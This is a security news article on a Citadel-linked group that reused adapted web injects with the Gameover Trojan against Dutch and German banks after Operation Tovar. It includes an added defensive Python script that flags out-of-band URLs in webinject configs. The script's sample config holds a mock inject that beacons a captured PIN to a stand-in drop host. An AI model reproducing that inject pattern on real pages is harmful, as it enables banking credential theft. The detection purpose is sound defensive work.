Security researchers at Arbor Networks' ASERT division reveal in a new blog post how a cyber-criminal group that ran a Citadel campaign, and that survived Microsoft's June 2013 takedown of the Citadel botnets, is now using a tweaked version of its Citadel web injects alongside the Gameover Trojan to target a number of small European banks.
A Citadel operator starts a campaign by buying a copy of the builder, using it to generate the malware, and then distributing that malware to infect machines and turn a profit. Each copy of the builder is tied to a log-in key, and the builder copies that key into every binary it generates, so a sample in the wild can be linked back to the specific builder copy, and therefore the specific customer, that produced it.
The finding raises an obvious question: how is the Gameover Trojan, a favourite tool for attacks on financial institutions, still in operation at all?
Earlier this month, the FBI, the UK's National Crime Agency (NCA), Europol (EC3) and various other law enforcement agencies joined forces in Operation Tovar to disrupt the Gameover Zeus and CryptoLocker botnets, which had infected some 500,000 PCs.
The agencies took control of Gameover's peer-to-peer (P2P) infrastructure, but did not rule out that the same cyber-criminals would be back on new infrastructure within four to six weeks.
Investigative reporter and independent security researcher Brian Krebs suggests that “the curators of Gameover also have reportedly loaned out sections of their botnet to vetted third parties who have used them for a variety of purposes”, and this appears to be backed up by ASERT's findings.
“Analysing webinject data from the global configuration file that was being distributed on the peer-to-peer network shortly before its takedown on June 2, 2014, it looks as if the threat actor behind Citadel log-in key 5CB682C10440B2EBAF9F28C1FE438468 had joined the ranks of Gameover's coveted third party,” reads the analysis from ASERT security researcher Dennis Schwarz. “Checking historical versions of the config shows that this collaboration goes back to at least January 2014.”
Crucially, this builder key was not associated with the 82 parties accused in Microsoft's Citadel lawsuit last year.
ASERT adds that the threat actor has adapted its Citadel web injects to work with Gameover and to target “a small set of banks in Netherlands and Germany”, and suggests that the group may have moved onto Gameover to steal bank credentials in late 2013, when Citadel activity was in decline.
In this latest case the core Citadel code is unchanged; what has been adapted are the web injects, the HTML and JavaScript the malware inserts into a victim's banking session to capture credentials.
“So far, it seems as if this threat actor has escaped the clutches of the great Citadel take-down and, since the drop site is still receiving stolen credentials, has evaded the Zeus Gameover take-down as well.”
Schwarz added in an email to SCMagazineUK.com: “While the exact details haven't been released, I speculate that Operation Tovar took over/took down the domain generation algorithm (DGA) component and a set of, in Gameover parlance, super nodes or proxy nodes. Among other functions, these special nodes were the main channel for funnelling stolen banking credentials to the threat actors.
“What I found interesting from the third-party campaign mentioned in the blog is that it used an out of band channel (built into the particular set of web injects referenced) to exfiltrate stolen data, outside of the main conduit. This secondary channel was definitely still collecting stolen credentials from victims infected with Gameover post-Operation Tovar on June 2.
“One of the reasons why Zeus based malware is so popular is that web injects can be retrofitted from one variant to the next fairly easily. Based on the web injects mentioned in the blog, I believe this particular threat actor was using both Citadel and their relationship with the Zeus Gameover crew to target the set of banks in the Netherlands and Germany.”
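Two of Schwarz's points above translate directly into analysis tooling: the webinject format is shared across the Zeus family, which is why injects port so easily between Citadel and Gameover, and an inject can carry its own exfiltration channel that keeps delivering credentials after the botnet's main conduit is gone. The script below is an added example, not ASERT's tooling or anything from the original blog post. It assumes the Zeus 2.x webinject text layout (set_url, data_before, data_inject, data_after, data_end) that Citadel and Gameover inherited, parses a config into per-target entries, and then flags any URL inside the injected content that points somewhere other than the targeted bank's domain. The sample config is constructed for the example and uses reserved documentation names rather than real infrastructure.

```python
"""Parse Zeus-family webinject text and flag out-of-band exfiltration URLs.

Added example (not ASERT's tooling). Assumes the Zeus 2.x webinject layout
that Citadel and Gameover inherited:

    set_url <url mask> <flags>
    data_before
    ...
    data_end
    data_inject
    ...
    data_end
    data_after
    ...
    data_end
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from urllib.parse import urlparse

SECTION_NAMES = ("data_before", "data_inject", "data_after")
URL_RE = re.compile(r"""https?://[^\s"'<>()]+""", re.IGNORECASE)


@dataclass
class WebInject:
    url_mask: str          # set_url pattern, may contain '*' wildcards
    flags: str             # request types it applies to, e.g. "GP" = GET and POST
    data_before: str = ""  # pattern locating the insertion point in the page
    data_inject: str = ""  # HTML/JS inserted into the victim's banking page
    data_after: str = ""   # pattern closing the insertion point


def parse_webinjects(text: str) -> list[WebInject]:
    """Split a webinject file into one WebInject per set_url entry."""
    injects: list[WebInject] = []
    current: WebInject | None = None
    section: str | None = None
    buf: list[str] = []
    for raw in text.splitlines():
        line = raw.strip()
        if section is not None:
            # Inside a data_* block: collect lines verbatim until data_end.
            if line == "data_end":
                setattr(current, section, "\n".join(buf))
                section, buf = None, []
            else:
                buf.append(raw)
            continue
        if not line:
            continue
        if line.startswith("set_url"):
            parts = line.split()  # set_url <mask> [flags]
            current = WebInject(url_mask=parts[1] if len(parts) > 1 else "",
                                flags=parts[2] if len(parts) > 2 else "")
            injects.append(current)
        elif line in SECTION_NAMES:
            if current is None:
                raise ValueError(f"{line} before any set_url")
            section = line
        # Any other line outside a data block is ignored (lenient parsing).
    if section is not None:
        raise ValueError(f"unterminated {section} block")
    return injects


def mask_host(url_mask: str) -> str:
    """Hostname a set_url mask targets, with scheme and '*' wildcards removed."""
    host = re.sub(r"^[a-z]+://", "", url_mask, flags=re.IGNORECASE).split("/", 1)[0]
    return host.replace("*", "").strip(".").lower()


def out_of_band_urls(inject: WebInject) -> list[str]:
    """URLs in the inject that point somewhere other than the targeted bank.

    Anything the injected script talks to outside the bank's domain is a
    candidate side channel for stolen data: it keeps working even when the
    botnet's own P2P/proxy exfiltration path has been taken down.
    """
    target = mask_host(inject.url_mask)
    foreign: set[str] = set()
    for name in SECTION_NAMES:
        for url in URL_RE.findall(getattr(inject, name)):
            host = (urlparse(url).hostname or "").lower()
            if not host:
                continue
            if target and (host == target or host.endswith("." + target)):
                continue  # same-origin resource, not a side channel
            foreign.add(url)
    return sorted(foreign)


def triage(config_text: str) -> dict[str, list[str]]:
    """Map each targeted URL mask to the foreign URLs its inject reaches out to."""
    return {i.url_mask: out_of_band_urls(i) for i in parse_webinjects(config_text)}


# Constructed sample in the webinject format; hosts are reserved/documentation
# names (RFC 2606 / RFC 5737), not real infrastructure.
SAMPLE_CONFIG = """
set_url https://*.bank-a.example/login* GP
data_before
<body*>
data_end
data_inject
<script src="https://cdn.bank-a.example/js/jquery.js"></script>
<script src="https://203.0.113.10/inj/a.js"></script>
<script>
new Image().src = "https://drop.invalid/gate.php?k=" + document.forms[0].pin.value;
</script>
data_end
data_after
data_end

set_url https://bank-b.example/ib/* GP
data_before
</head>
data_end
data_inject
<meta name="x-custom" content="1">
data_end
data_after
data_end
"""

if __name__ == "__main__":
    for mask, urls in triage(SAMPLE_CONFIG).items():
        print(mask, "->", urls or "no out-of-band URLs")
```

Running the script lists, per targeted bank, the hosts the inject reaches out to beyond the bank itself. In the constructed sample the first inject loads script from an outside IP address and beacons a captured PIN to a third host; those two URLs are what a defender would pivot on (block, sinkhole, or watch for in proxy logs) independently of whatever happens to the botnet's P2P layer, while the second inject touches nothing outside the bank's domain and is reported as clean.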
Kenneth Bechtel, malware research analyst at Tenable, said that this latest case is a classic example where takedowns can't keep up with the new strains of malware.
“Considering that malware is often used as a profit centre, this development comes as no surprise,” he told SCMagazineUK.com.
“Major takedowns such as the Citadel campaign and even Zeus net have had positive results. However, with the sheer volume of variants being controlled, it is no real surprise that a few very small organisations were targeted, slipping through the cracks.”
“Since this one has popped up on someone's radar, I'm confident it will be dealt with quickly. Dealing with malware and botnet Command and Control (C&C) is very much like playing whack-a-mole: while the industry does its best to be proactive, we cannot predict what server will be compromised next and leveraged for C&C, and can only react accordingly. As long as malware is being sold on the black market and used as a profit generator, we will continue to see this type of one-off attack.”